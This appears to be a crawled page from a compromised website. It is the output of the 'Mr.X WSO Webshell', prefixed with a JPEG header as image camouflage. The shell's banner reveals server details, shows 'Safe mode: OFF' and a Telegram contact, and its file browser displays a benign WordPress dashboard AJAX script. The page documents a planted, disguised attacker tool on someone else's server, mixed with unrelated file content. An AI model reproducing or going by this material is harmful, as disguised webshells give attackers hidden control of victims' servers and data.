����JFIF���������
| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-09 23:20:29 1999.30 GB Free: 66.41 GB (3%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
<?php
/**
* Handle default dashboard widgets options AJAX.
*
* @package WordPress
* @subpackage Administration
*/
/** Load WordPress Bootstrap */
require_once( './admin.php' );
/** Load WordPress Administration Dashboard API */
require(ABSPATH . 'wp-admin/includes/dashboard.php' );
@header( 'Content-Type: ' . get_option( 'html_type' ) . '; charset=' . get_option( 'blog_charset' ) );
send_nosniff_header();
switch ( $_GET['jax'] ) {
case 'dashboard_incoming_links' :
wp_dashboard_incoming_links_output();
break;
case 'dashboard_primary' :
wp_dashboard_rss_output( 'dashboard_primary' );
break;
case 'dashboard_secondary' :
wp_dashboard_secondary_output();
break;
case 'dashboard_plugins' :
wp_dashboard_plugins_output();
break;
case 'dashboard_quick_press' :
wp_dashboard_quick_press_output();
break;
}
?>